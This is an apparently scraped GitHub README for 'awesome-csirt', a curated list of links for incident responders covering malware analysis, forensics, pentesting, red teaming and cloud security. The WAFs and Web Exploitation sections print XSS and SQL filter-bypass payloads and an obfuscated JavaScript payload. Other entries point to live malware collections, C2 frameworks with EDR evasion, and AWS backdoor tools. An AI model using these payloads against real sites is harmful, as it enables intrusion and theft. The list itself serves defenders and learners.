Skip to content

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

License

Notifications You must be signed in to change notification settings

Spacial/awesome-csirt

Repository files navigation

CSIRT Awesome

*Please contribute through pull requests- ;)

Another great list: awesome-incident-response

Books

Links

Incident Response

Hashing

CVEs

  • Some CVEs stuff and links here and in here
  • MikroTik search on shodan.
  • TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
  • cve_manager: A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.
  • dorkbot: Command-line tool to scan Google search results for vulnerabilities.
  • NotQuite0DayFriday: This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly.
  • Exploit Prediction Scoring System (EPSS): The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
  • CVE PoC: Almost every publicly available CVE PoC.

Malware Analysis

Web Malwares

Malware Samples

Repos

  • A repository of LIVE malwares for your own joy and pleasure: theZoo
  • malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
  • Beginner Malware Reversing Challenges, by MalwareTech. repo
  • MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts
  • C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
  • LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
  • MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
  • What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.
  • Malpedia: The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research.

Ransomwares

Virus/Anti-Virus

Trojans/Loggers

Malware Articles and Sources

Reverse Engineering

Decompilers

Yara

Ghidra

Frameworks

Patching

  • Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

Hardening

WebServers

Credentials

Tokens

Secure Programming

Web Training

SAST

Secure Web dev

Formal Analysis

Fuzzing

API

REST

CTFs

CTFs tools

  • CTFs-Exploits
  • nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
  • thg-framework
  • Super-Guesser-ctf
  • Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
  • sec-tools: A set of security related tools.
  • Real World CTF 2023: Solving a Java CTF challenge by writing static analysis passes!

Phreak

Archs

Hardware

ARM

Pentesting

Reconnaissance

Enumeration

WebShells

ShellCodes

Reporting

OSINT - Open Source INTelligence

OSINT Webscraping

OSINT Chats

Vulnerability

WAFs

    '';!--"<XSS>=&{()}
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  • CloudFlare XSS Bypass:

<svg
onload=alert%26%230000000040
"1")>
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
jaVasCript:/*-/*`/*\`/*'/*"/**/( oNcliCk=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Exploits

Payloads

Bug Bounty

  curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Web Exploitation

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
Burp Suite

Red Team

Command & Control (C2)

Purple Team

DNS

Exfiltration

Steganography

Phishing

Forensics

  • Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
  • O-Saft: OWASP SSL advanced forensic tool
  • PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
  • swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
  • The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
  • Invoke-LiveResponse
  • Linux Forensics
  • CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
  • mac_apt: macOS Artifact Parsing Tool
  • MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
  • imago-forensics: Imago is a python tool that extract digital evidences from images.
  • remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
  • Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
  • libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
  • usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
  • Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
  • KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
  • AVML(Acquire Volatile Memory for Linux).
  • turbinia: Automation and Scaling of Digital Forensics Tools
  • Eric Zimmerman's Tools
  • MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
  • Kuiper: Digital Forensics Investigation Platform
  • file Signatures:
  • PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
  • OfficeForensicTools: A set of tools for collecting forensic information.
  • FBI Electronic Tip For
  • CHIRP: A forensic collection tool written in Python.
  • Hash Cracking with AWS and hashcat
  • Hashcat new feature: autodetect hash-mode
  • L0phtCrack is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables. gitlab repo
  • Foremost: is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you
  • TrID: is an utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way.
  • image-unshredding: Image unshredding using a TSP solver.
  • Linux Incident Response Guide
  • FastIR Artifacts: Live forensic artifacts collector.
  • MVT (Mobile Verification Toolkit) helps conducting forensics of mobile devices in order to find signs of a potential compromise.
  • Cloud Forensics Triage Framework (CFTF)
  • Forensic Investigation Cisco Stealthwatch at work
  • Andriller CE (Community Edition): is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices.
  • Dshell is a network forensic analysis framework.
  • exif-gps-tracer: A python script which allows you to parse GeoLocation data from your Image files stored in a dataset.It also produces output in CSV file and also in HTML Google Maps.
  • Anti-Forensics:
    • ShredOS x86_64 - Disk Eraser: for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe.
  • dfir_ntfs: An NTFS/FAT parser for digital forensics & incident response.
  • MemProcFS: is an easy and convenient way of viewing physical memory as files in a virtual file system.
  • LeechCore: Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent.
  • PCILeech: Direct Memory Access (DMA) Attack Software.

PDF

Email Headers

Distros

Volatility

Blue Team

Threat Hunting

MISP

APT - Advanced Persistent Threat

IoCs

SIEM

Browsers

Browsers Addons

Operating Systems

UEFI

Windows

Active Directory

Mimikatz

Powershell

Office and O/365

macOS/iOS

Mobile

Android

Linux/ *Nix

Cloud

GCP/Google

Azure

AWS

  • git-secrets: Prevents you from committing secrets and credentials into git repositories.
  • CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
  • Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
  • my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
  • RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
  • FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
  • AWS IAM privileges as found using the AWS Policy Generator described at
  • Sadcloud: A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
  • Endgame: Creating Backdoors in AWS.
  • Bucky: An automatic S3 bucket discovery tool.
  • Prowler: Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
  • barq: The AWS Cloud Post Exploitation framework!
  • Text → AWS IAM Policy: Describe your ideal AWS IAM Policy in plain text and will use GPT-3 from Open AI to generate an AWS IAM policy.

Risk Assessment and Vulnerability Management

Guidelines

ICS (SCADA)

Radio

Satellite

Social Engineering

Tools

Note-taking

Kali

IP Reputation

Shell tools

  • Python-Scripts: some scripts for penetration testing.
  • SubEnum: bash script for Subdomain Enumeration
  • password-store: Simple password manager using gpg and ordinary unix directories.

Search Engines

VPN

  • jigsaw project by Alphabet/Google. Outline: VPN Server.
  • SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
  • WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
  • Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
  • Sputnik -An Open Source Intelligence Browser Extension
  • PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
  • uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
  • Nefarious LinkedIn: A look at how LinkedIn spies on its users.
  • ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.
  • Nebula: A scalable overlay networking tool with a focus on performance, simplicity and security. Introducing Nebula
  • AirVPN A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship.
  • Build your own private WireGuard VPN with PiVPN.

Secure Sharing

  • CryFS: Keep your data safe in the cloud. code
  • Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
  • VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
  • CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
  • Boxcryptor: Security for your Cloud.
  • Nextcloud E2E: End-to-end encryption RFC. Some old news about it
  • DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
  • ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
  • Mozilla send: Simple, private file sharing from the makers of Firefox (archived). Revival: send

Privacy

General

Configs


Resources

  • 13 Best New Software Security Books To Read In 2021
  • pwn.college is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”.
  • 'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'.
  • Pwnable.tw is a wargame site for hackers to test and expand their binary exploiting skills.
  • Security Zines: graphical way of learning concepts of Application & Web Security.

Training and Certifications

Conferences and Slides

Sans

psyops


Sources

Some good places to visit:


Fun


Articles


Other Repos